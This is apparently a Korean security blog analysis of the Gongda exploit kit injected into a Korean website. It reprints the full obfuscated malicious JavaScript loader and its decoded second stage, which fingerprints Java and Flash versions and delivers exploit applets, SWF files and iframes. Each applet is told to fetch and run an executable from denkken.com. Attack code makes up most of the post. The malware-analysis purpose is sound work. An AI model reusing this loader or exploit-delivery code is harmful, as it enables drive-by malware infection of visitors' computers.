gondad exploit kit을 이용한 악성코드 유포

  아이닥터 사이트에서 공다팩을 이용하여 악성코드 유포중이다.

<script type="text/javascript" src="swfobject.js"></script>

<script src=jpg.js></script>

<script type="text/javascript">

var GAoIa3=navigator.userAgent.toLowerCase();

var WyyymuN6="1"+"1"+"1";

if(document.cookie.indexOf("tJCLDp7=")==-1 && GAoIa3.indexOf("linux")<=-1 && GAoIa3.indexOf("bot")==-1 && GAoIa3.indexOf("spider")==-1)

{

var QuIvMl7=deconcept.SWFObjectUtil.getPlayerVersion();

var expires=new Date();

expires.setTime(expires.getTime()+24*60*60*1000);

WyyymuN6="0"+"0";

document.cookie="tJCLDp7=Yes;path=/;expires="+expires.toGMTString();

if(document.location.hostname.length>0){GRjrMK4="1"+"1";delete GRjrMK4;try{GRjrMK4+="0"+"0"+"0"+"0"+"0"+"0"+"0"+"0"+"0"+"0";}catch(e){var wLGud5="1";KOzN2 = eval}GmiO3=unescape;}RyyzDd4="4720B7DC4406E7B177119EF42B62A4E56A3CA7AF1A3495EE5D0C9B91075BDC95035DC4990F58CFDB531C94D5170E95DA2712739624ED67CF2EE125BB32ED7FA726E071A623BF6FBE32E179F87DA542A65DBF0DE36AAB5EBD19854B8F01CD51800A90508714C4558915C112930DDC2180E6F8289DEAA42688A3E22E6BEBB07721A8C00A68F8B2717DFEBB7C3AFDB668618DBC606CC28F7063C38C7440878E7346D78C44559ECA293ACD945A14D896425CA2994801A360442CA4707225B96C122FB6650A1E92666C79F03B6A3BD2173A659101317A955D3D6B844760718B552667835D656CDF173C3ED202192A98527640662564157B24525F6A004A443B2C5A466F0A1C653573554C736457250B26646A5B5163674C3D676B063C7F5D397F27721F74713500486C694D5778222F4C6A773345337D601A2515454E1D162754641D735C6A576208725C2324525E77124D6D3D3F4D447B304F5D332E6C1263596B6F44251F630E2407452178266C07722B3E57782C780B69217412013767514161683B14707D3716051E363C06712915383434567A44625960183A702B183A75000A2969435F7D2949506F6F11092C31000C3625483C03215F2B49695D2C532D7D7D19257762133F6E20507222605A4528360214363C73192D303B51283C2C5E627C2E5168206E082110300E380221617B476521414877771901267D18043E782132600C3A4A7E7714274C675C25432D01684F7E233942702A241D7A3A655669294157443D6D5151282B2259747C22592F3D703C067F205B747D371763496749701925703E13064F4743612D45543D254D5D7039580539301207120F5D260B215F2B49695D2C532D7D7D19257667133F6E20507222605A4528360214363C73192D303B51283C2C5E627C2E5168226E082110330D380221617B476521414877751901267D1B053E782132600C3A5B706B5021472759364465553E4E2C622D615412611D7338671526410E5C4E3E6C5E412E6F2C4D612D656A677A3A506E5F205B617D317C6C502D5E744574323E13064F4743612D45543D3E4D405625584A726345487A2D16244C7D59660B2F543C5F617A630071213E58722D6E197E23691456357A1140786961003F1D4D4967773E5C69763B1B727337403A41734D7D4A630274416721084B60274051776413391D2C21327E6D43593F6C52600B215F2B49695D2C532D7D7D18257462133F6E20507222605A4528360214373C73192D303B51283C2C5E627C2E5168206E082210300D380221617B476521414877771901257D18043E7150443B295753716155245B350575123D0F7B0B37666C487A2A34527D303E0A2C79340B117921322F7B01494E6B7E234C6C3A2A436F7026437521715E57594A09364E77263E13064F4743612D45543D2E4750726C0E7F746F525D7B404C380D46502A48235F244A62336E14184E375C772C6153333F614F60247C4D4C6279374C2C323F44697B2650637439173C3E3B4D605039123740622F77436E2B0E4F60240B47763F06516F340E11200C3A5B706B502147274B21534C483C597822395B706C7251776A2C156A237D54542961454D69742A486B7D264264626918371545527F723758700E70586C6573356E4169305449276B575931610A57783F4B547A6849597D704529012003492D6A53264F7024625C703011476D3A69556838611303327B1D09223B771126397C200270245279752A5B6432315670592D5C6854622F786B632C4C48272E4B5E772C4C1D2C5C2645160B55506C6014294529106C4062522C4A75387012247360032A6826113D2B6B5545316C471B3D3D741934206E0D74686B196B77215171782B052911350D2B1627673A086C2A4E486E2D5C0E2E7C1E0427610511160B4B3115625B2E47685C6A467F5F20426725710D581417496C7B2E5D6D2B26002C5A6F504B646D2707677F234835362C5E62687E02222F7D7E7B4E675C6C50662277066829415F7C6B1F3D192A475A733048166864447D6B714629417C4C210F2F44214A7E2D2D407932721F3B2074436D762B14453566544E65626D4A6B7D685A6D666554747D6D1C2B11595E7B4E675C7C0A742468697F3152456D3C50553B6F4A5A357D0E4F74785F49666C4E284A71512548605D274767626514184E375C772C6153333F614F60247C4D4C6279374C2C3234442A3869526376285971752A5C765572543A0D3C4C164F642B444D6B675755670C5C4065384E4D6F64181E7D76166C013E0C7C0524074521752F2F5A78213E47372A6F536462654B5135665B6668652F4D2C7728436C752F18371545481D163655674523547E042F2673466F24445433741507237D1E1431770C5F746F545D7B7D0A7D123E087417243142501C4A3A4E67641A5A743B47023D71244C483E6C50522E62225F6D772659676665447F7D3D7477793D4D3A546C71775362335F497820080534442E59756D007E7E3C5F7F2E2F59527B604C0F45211F29546459681D36696C113569611A14427B3A17286B58543D6D51512E7B314070756F0F345B097B495B1B157370324A674967003F476B32754C317D6168360A1C0423601800231401092A4501115D3671790E39087C17387A7C122804751C3264275A7D3C680A3A7E340B0670605A4C676437142322771D2F2A77416D6A2E5830723254711D7B54794B6A2073447D65564D633C410D336A40406321161734655552746E512E0D6A5729087A593A05743829082B7820526B296D17732D695E1C32661F536160364C3930605A676D24447571355D79643A587B4D62527452207F20586A3741412F27455D76705B5D37274D546E640D1C38665B2E4465592D5E685E3D5A786772136525225274686E567029395952707E5E4975697E09232773152F2A77416D6A2E5830723254711D40725C6127377D447E201D0C282A5248217D19066F29544035465F527B73426E40655937542A02745B70322D42352A315E7C7561457E246D4D44707E5E4975697E0923763F457A7B7F1F666828122E207C76566A467E4C1A2568272501382D266A2557551E4753391D3643567F6054127E7757284A7F5D79056B4420597E74624565237208144267587328655F0F33675B403D2E205F7C22771C3A6C33497436085A7E78254F3A436F5C6B57257A11226C2A4E486E2D0A43763969406323455A6E7555143D7D5D214C64592B4B7B1E64097934385F2F6B7F577C266B5C78222A584E3D2748407222265161326E16051E2C5E627C2E513E6F364D5554774F71467235790029274E0E236B535F6A225D4D7E2B44516368515372645B2C552B117F2A075B274575212801662124726D3C725E7F39705E09727B56072C2E20466A772B4C616D2E537969261739275E33734F6D5979402932795C4A31545E662B514476650A566473001A2C35081E363E394A47665B314A68523C05732F28563B2520437C2664747525685F093767514161686A12091A3A200269463B69743C50307535193C476C537C45633920153A72101C38690216332A475A73304840253C010B2F3504692E0343492D7B5D3A0B5B29215C5271700E393F6959792373154F317E564261782C5B2A6534487A552C54626C61417F503C4E7152405C6B412F682725012C460C27034D5D600A1D1A7E3F485D634E56143868472946290E630E2D026806206941256E495A57762B755A782270155622614B40282E7F66465A026E5C34285D6D6B3C5C7421745A78536A59221C4605256B337110013F7D10753E7C1970267C6E0B5E381D0C2F3D0475653D017D63340F6F0B6629285B7D7977012978271775296D5C4924351817303C64173860265F69796B5F6D752A086875325679416C516E047120705D6E78000B673D504029620750723F47537E6F1E5F70681B37467B16215F681B761761213E4E78643E52742D3D55736C725A4D256D0205277B2C506B653E44727C22496579205871733F4F331E3F4D7956662C3C466A2845117C20044672215D512A710B5B746F57507E6C4D25417C492D003300384A6321210F7B253D56242A73176B2D684E446D281812343464173860265F69796B5F6D752A085353177C345662516D413A613B4F642B571E3F781605237A1E1A503E425C6A701E5F7364473304370434467F5D250B7F21214A28252250712176523D3A65575435351F0269672558343E2D5D6F33750D23570D7F555F07073609383012590A4B794478202D2674442E577C234C55737F4D4A7869594A7A381629486F497409674C2F092A4D46487A2A34527D66635879293919463F664817303D711C342771034F7B25557D6961567C7D204A361B0E377F4B69257D4C253645584E3D50427A2F5D4072790E4072605F517E6A583601251A2C53794C72043E2429417E2F355D372B6F5A323B61490F35705A0729374E23637F294969706542696C0E41646E3A5B615466153A466963300A7C2A59437A304D4A7B24505D763E4159746D461E363E394A446656204669123B4E6501385B672D32466D2D28156E25261703336751426C6D2A506172325C6136620A0112285A7E78325D3A53664959507333754A7E3145042D2B57123F6F1F002F730503160B54537C7059254D7D1626486945664A613029417107385A752C28507222605A457933322F7D014954091A22417B716B586A3867527F72375870583F00291337702C082D63004B602740517735160926661C082B283D3664083E36427B180E4E604F0F1E317D6C587C2A345C6E666E566B25635A553F7A115073693168637529592660247D636F2A47537D205C3C093830124D616134626228536B3A674D5E7728507B71790B556868551C29221D601D2915750E003633261B24234C6029355D6D66774574386113036C477D6F454F1709677C265E7B7D2F0C2B7B23467978690155643A7E2010376C2C1C3F000D1D3E0D151D517E6D0D3A611C002B347608263C7079102E18334E6948201636727C1F32643856702F6843206B360B1177360355617E2244247E26406D2933586D7722547F70251962416F487D192766745C7F351A03202D415E78264D5A393243553476554E31604C2504370434467F5D250B7F21214A28263E136F296C427871241C563F715050796539416D682E4C67792A5E606E680B2C6C324B754D23537949627C6F412B3341407A2C1910342E475A703D4D51626452496E6C137E1F79593646601C264A7C25714D66642652753D650A3D6B330F1977360355617E2244247E26406D29087E485D6F437170265C29002445754835712D1B3B71121E2111697C217D190727651E0A35625C5D6C76137E1F79593646601C264A7C25714E6727385A6F2D20417C20715E1C702F4C40664474076E60200A3628647E4E520A76442271102F2D0940152E622D6F4D064F5B21052E4B5E772C4C1A76234F50727755013D7651266B3E162E576A1E73261B2723417125341D7A276452206E7C564D62380E163038711B2A480A613A247A023C2C7D073E7F3F5867532106152E602E724C6A210E5F6A3D6544673F4156622549103979595D7068552F4F7F1A680565483C5B2B6F634B702A3B587C262E5472212B4C4422265A5D652E6A12091A204266702A55226B2A415168274B7D4276497D0C2523720A27675743762651497A37405D6F384D5776605F5069271D7B2E035F2B49695D2C056225386E6130225A7B3D7452356E7752037C2A5C4A6E6B2F486D69224F7D6522132523423F77733D5D75442D4E7D504635685A622755586A610652606F04162065141A323A3D367B6A57354E6C5630096F532C523F213C5F702A347071216C53352B6B5545316C161E0D063E240E6D4A2775194154606B2A156B155E331D2D093471422F694D5D42336D403812035D72274746300C11052A30101A392565356A7F752810561B25427F2F3E0848796D07396E26174C394D4D6C3C3F64027269350E592D7A1938266B172A386764655525747817581A7F4B69257D4C2C181E112F7B1205336B0E144624654E566D076738625B2E47685C637A310168192977650635382C133119757E6B01680C7A77655E4F6F7E6474392D761C28326D115D6D06435D706462334D6A537756201C21153E65060A2F185179650044034C765E5D6D266D0122300472032F1E640F5C49015D5C2C7B7432233F5D7D2964104072391B1061381F03262C125C4D660A413F4F6C5663762B54743B0E05290032092E0D2E686725014C44436C3C49557D3906436538585D776F181E236C5927037A4A271A6570027260077C016633360D25142F5E702B3A19086B05352C7369377D6D7D22427D60631368772C407D793D4D3A5771546C416B2F3474297945416D2C401064244C407F6C1D082B21585976625C341E391837556E0120675B193D68256A23447F763C6B4163615643356C01792225780B2822771D383D703C061132381A15365567457830122D0A4B155E6A37006666245777266D15146038425C74761E527E735D27427D573609784F2D5950272941616A245C552777526F0F654844782104280A052A4F24386F67617938763936265B74792B76720824506B4D62612A0F22651E0C22780D4C6F65625D7A226B0D35685E587A7D7B260B2E55374E681C7F0C3860720F3875791A39330D3D14286B58543D6D51512E7B314070752B43203677586A6A2E58753C204B771D497C7F4C6B246F1A252D54416377186C3C244E46763C490639280B31150C494D29005D2854681C214D396806467837170637216E5378344B5D0977654C4C652C7B0E2D30790D252562112A3E6F1D7E7D2550734177526A0A7232795A4A2245427B674D5E7728507B71790B6F726F54536876140E77290D6A162A156815316D7D063562761331266141742B654F4E22265D576F7B304C765C26436F612A566936265B74792B767208245677032E6122082674090574442E3977224B417A34424C357642556B60582E0B2B042D417F5D254E31333E4C28251E724F792E5F692168051D0C275643726D2E4C3A326E16051E424C011246481D162E341E1B0E377C416B24684D2B326F5B472D1C0B1E474C517B34585D3B4679767B6C7E2F1432354E4368502D5F7460246A533D124621730D3D7929685E5535285E5D4F4D011F3F1D4D496D782E45693838605354056B761238301240622D795C6E656F627B1E6E79557C13391D3549547E75551C7641732D4A3D03492D6959244E65256C795A08190B22450A537820614F44704C496A76431A1D3F1D4D496D782E4569382A6760486402192A6758744173243C796309584A3B72293A7728445163340C6B50705A512B3E394A476C542153681C1A52683A084B217F5D397D2D6C526929245765166C0B1E0D06274C68753348285F044B422A74381A7836557154661D6156512F4E1930482A486A254144766D6F597E1E1F03160B5459736040250343713140690A73261B242943703035137F2255646B0F430B1A5D025B406C69374C2445365F7E7D3800371545517570364D71007B4C514540762725012145406A3D4110590B59417E641735116555507A71516055667936403A0745217525204A61217067742F54644A7F3F362B346D53407469635875481F153319415569742A41753C0A40636B475F2D1F0A4B784D672054492F0E765A610063002C5C265C7E6D55487A25430C647C5C711C00362C4E7D25384A35111D51493E360C1046605E4D357C5A0556670D7E312B4A276C712754787D6F645B66155E711238301240622D795C6E65704261104B0228402250723D494C7E21497050497175180432204261593C4E313327776416280022450A537820614F44707F5455496509193F1D4D496D782E4569381F796166340B2F2D09597D48623579085B125A6A4118410828402250723D494C7E2156487B4D5271180432204261593C4E31182A6B4C2E26792C730D3D7929685E553528696C46617712091A335F716F085E60742A56645B324B76416458300D3C3C7F497F2648046A605F4D1E47";wOwHd8="function GIJdiJo7(){hEFyBu8=Math.PI;TmgTSW3=Math.tan;axOAB6=parseInt;wUCHVRb2='length';JFqui5='test';fjUSvCG0='replace';ONtWJIF1=axOAB6(~((hEFyBu8&hEFyBu8)|(~hEFyBu8&hEFyBu8)&(hEFyBu8&~hEFyBu8)|(~hEFyBu8&~hEFyBu8)));iDGmi4=axOAB6(((ONtWJIF1&ONtWJIF1)|(~ONtWJIF1&ONtWJIF1)&(ONtWJIF1&~ONtWJIF1)|(~ONtWJIF1&~ONtWJIF1))&1);/*denkken.com*/VOLI8=iDGmi4<<iDGmi4;new function(){lDFd4=KOzN2('1Qe4dG*]6zY^k8vb]#&,m8$[x_GD3a]Nj5dsn7[F[8cu[S34Rlc]4r;idpDt='[fjUSvCG0](/[^v@0el9a]/g,''));};try{if(!\/^\\d*$\/g[JFqui5](DvOvOY4));}catch(e){DvOvOY4=ONtWJIF1;}eRpT7='';QhLxf4=String[GmiO3('%6'+'6%72%'+'6F%6D%4'+'3%68%61'+'%72%43%6F'+'%64%65')];for(SKqjm4=ONtWJIF1;SKqjm4<wOwHd8[wUCHVRb2];SKqjm4-=-iDGmi4)DvOvOY4=((DvOvOY4&127)<<25)|((DvOvOY4&4294967168)>>>7)+wOwHd8.charCodeAt(SKqjm4);voArg7+=iDGmi4;DvOvOY4>>>=0;for(SKqjm4=ONtWJIF1,JIugd6=iDGmi4;SKqjm4<RyyzDd4[wUCHVRb2];SKqjm4+=VOLI8,JIugd6++){if(SKqjm4>=(1<<3)){YywKDb5=SKqjm4%(1<<3);}else {YywKDb5=SKqjm4;}qqXX8=axOAB6('0x'+DvOvOY4.toString(iDGmi4<<4).substr(YywKDb5,2))+JIugd6;if(\/^(\\d{4})\/g[JFqui5](qqXX8+744))qqXX8%=84;eRpT7+=QhLxf4(axOAB6(ONtWJIF1+GmiO3('x')+RyyzDd4.charAt(SKqjm4)+RyyzDd4.charAt(SKqjm4+axOAB6(iDGmi4)))^qqXX8);}try{new function(){lDFd4(eRpT7);}}catch(e){try{new function(){Uqrvis1=parseInt;TmgTSW3(eRpT7);}}catch(e) {window.location='abou'+'t:bl'+'ank';}}}try{KOzN2('GIJdiJo7();')}catch(e) {try{voArg7=ONtWJIF1;KOzN2('GIJdiJo7();');}catch(e){alert('ere');}}";yrVnR1 = KOzN2(KOzN2);yrVnR1(wOwHd8);

}

</script>

<script language="javascript" src="http://count7.51yes.com/click.aspx?id=72296135&logo=8" charset="gb2312"></script>

  내가 아는게 맞다면 이런식으로 표현하는 것으로 기억한다. 차례대로 난독부, 해제부, 실행부로 나뉜다. 해당 공다팩 deobfuscation 방법은 http://14.63.218.164:8000/gongda/ 에서 복호화가 가능하다. 이 외에도, 스크립트 수정을 이용하여 복호화가 가능하다.

  위와 같이 ciphertext에는 난독부를 써 넣는다. key_string부분에는 해제부 부분을 복사하여 붙여넣으면 원문이 나오게 된다. 다음에서 복호화 내용이 나온다.

TmgTSW3 = lDFd4; xqIaG7 = Uqrvis1(20100418); while (window.closed) {} document.write("<br>"); var gondady = document.createElement('body'); document.body.appendChild(gondady); var gondadx = deployJava.getJREs() + ""; var arrx = gondadx.split(","); gondadx = parseInt(arrx[0].replace(/\.|\_/g, '')); for (i = 1; i < arrx.length; i++) {     tmp = parseInt(arrx[i].replace(/\.|\_/g, ''));     if (gondadx < tmp) gondadx = tmp; } if ((gondadx <= 17010 && gondadx >= 17000) || (gondadx <= 16032 && gondadx >= 16000) || (gondadx <= 15033 && gondadx >= 15000)) {     var gondad = document.createElement('applet');     gondad.width = "1";     gondad.height = "1";     if ((gondadx <= 16027 && gondadx >= 16000) || (gondadx >= 15000 && gondadx <= 15031)) {         gondad.archive = "aNAV1.jpg";         gondad.code = "GonqabGonqabExp.class";         gondad.setAttribute("dota", "http://denkken.com/wer.exe");         document.body.appendChild(gondad);     } else if ((gondadx <= 17002 && gondadx >= 17000) || (gondadx <= 16030 && gondadx >= 16000) || (gondadx <= 15033 && gondadx >= 15000)) {         gondad.archive = "gCyI4.jpg";         gondad.code = "GonbadExx.Ohno.class";         gondad.setAttribute("xiaomaolv", "http://denkken.com/wer.exe");         gondad.setAttribute("bn", "woyouyizhixiaomaolv");         gondad.setAttribute("si", "conglaiyebuqi");         gondad.setAttribute("bs", "748");         document.body.appendChild(gondad);     } else if ((gondadx <= 17003 && gondadx >= 17000) || (gondadx <= 16032 && gondadx >= 16000)) {         gondad.archive = "MPGzu3.jpg";         gondad.code = "gonp1723.Gondattack.class";         gondad.setAttribute("xiaomaolv", "http://denkken.com/wer.exe");         gondad.setAttribute("bn", "woyouyizhixiaomaolv");         gondad.setAttribute("si", "conglaiyebuqi");         gondad.setAttribute("bs", "748");         document.body.appendChild(gondad);     } else if (gondadx <= 17006 && gondadx >= 17000) {         var JimsG5 = window.navigator.userAgent.toLowerCase();         if (JimsG5.indexOf('msie 6') > -1) {             document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://denkken.com/wer.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cvx2012xxxx.Gondvv.class'><param name=archive value= 'fxhro4.jpg'></OBJECT>");         } else {             gondad.archive = "fxhro4.jpg";             gondad.code = "cvx2012xxxx.Gondvv.class";             gondad.setAttribute("xiaomaolv", "http://denkken.com/wer.exe");             gondad.setAttribute("bn", "woyouyizhixiaomaolv");             gondad.setAttribute("si", "conglaiyebuqi");             gondad.setAttribute("bs", "748");             document.body.appendChild(gondad);         }     } else if (gondadx <= 17007 && gondadx >= 17000) {         var JimsG5 = window.navigator.userAgent.toLowerCase();         if (JimsG5.indexOf('msie 6') > -1) {             document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://denkken.com/wer.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'gonw20125076.Gondqq.class'><param name=archive value= 'ikfq0.jpg'></OBJECT>");         } else {             gondad.archive = "ikfq0.jpg";             gondad.code = "gonw20125076.Gondqq.class";             gondad.setAttribute("xiaomaolv", "http://denkken.com/wer.exe");             gondad.setAttribute("bn", "woyouyizhixiaomaolv");             gondad.setAttribute("si", "conglaiyebuqi");             gondad.setAttribute("bs", "748");             document.body.appendChild(gondad);         }     } else if (gondadx <= 17010 && gondadx >= 17000) {         var JimsG5 = window.navigator.userAgent.toLowerCase();         if (JimsG5.indexOf('msie 6') > -1) {             document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://denkken.com/wer.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'xml20130422.XML20130422.class'><param name=archive value= 'sefH7.jpg'></OBJECT>");         } else {             gondad.archive = "sefH7.jpg";             gondad.code = "xml20130422.XML20130422.class";             gondad.setAttribute("xiaomaolv", "http://denkken.com/wer.exe");             gondad.setAttribute("bn", "woyouyizhixiaomaolv");             gondad.setAttribute("si", "conglaiyebuqi");             gondad.setAttribute("bs", "748");             document.body.appendChild(gondad);         }     } } else {     if ((QuIvMl7['major'] == 11 && QuIvMl7['minor'] == 4 && QuIvMl7['rev'] == 402 && (QuIvMl7['gondad'] >= 265 && QuIvMl7['gondad'] <= 287)) || (QuIvMl7['major'] == 11 && QuIvMl7['minor'] == 5 && QuIvMl7['rev'] == 502 && (QuIvMl7['gondad'] >= 110 && QuIvMl7['gondad'] <= 146))) {         document.writeln("<img src=hLJYqG0.swf><\/img>");         setTimeout("document.writeln(\"<embed width=100 height=0 src=hLJYqG0.swf><\\/embed>\");", 2000);     } else {         var JimsG5 = window.navigator.userAgent.toLowerCase();         if ((JimsG5.indexOf('msie 6') > -1) || (JimsG5.indexOf('msie 7') > -1)) {             document.writeln("<iframe src=JAghles2.html><\/iframe>");         } else if ((JimsG5.indexOf('msie 8') > -1) && (navigator.userAgent.indexOf('Windows NT 5.1') > -1) && (navigator.browserLanguage.indexOf('ko') > -1)) {             document.writeln("<iframe src=aNAV1.html><\/iframe>");         }     } }; delete wOwHd8; delete GIJdiJo7; delete hEFyBu8; delete axOAB6; delete wUCHVRb2; delete ONtWJIF1; delete iDGmi4; delete VOLI8; delete DvOvOY4; delete eRpT7; delete QhLxf4; delete SKqjm4; delete RyyzDd4; delete lDFd4; delete KOzN2; delete yrVnR1; delete GmiO3; delete JIugd6; delete fjUSvCG0; delete Uqrvis1; delete xqIaG7; delete JFqui5; delete voArg7; delete TmgTSW3; delete qqXX8; delete YywKDb5; delete GRjrMK4; delete wLGud5; delete UMbPv6; delete VkNW5; delete QKzFge2; delete PnnYo2; delete yLOLE5; delete skXqRx3; delete wkpIiJ0; delete PLqzg2; delete PWzFNQe8; delete ftdHf1; delete XfDYjvJ5; delete VIFm4; try {     CollectGarbage(); } catch (e) {}

hxxp://denkken.com/wer.exe 현재는 다운 불가능하여 분석 제외.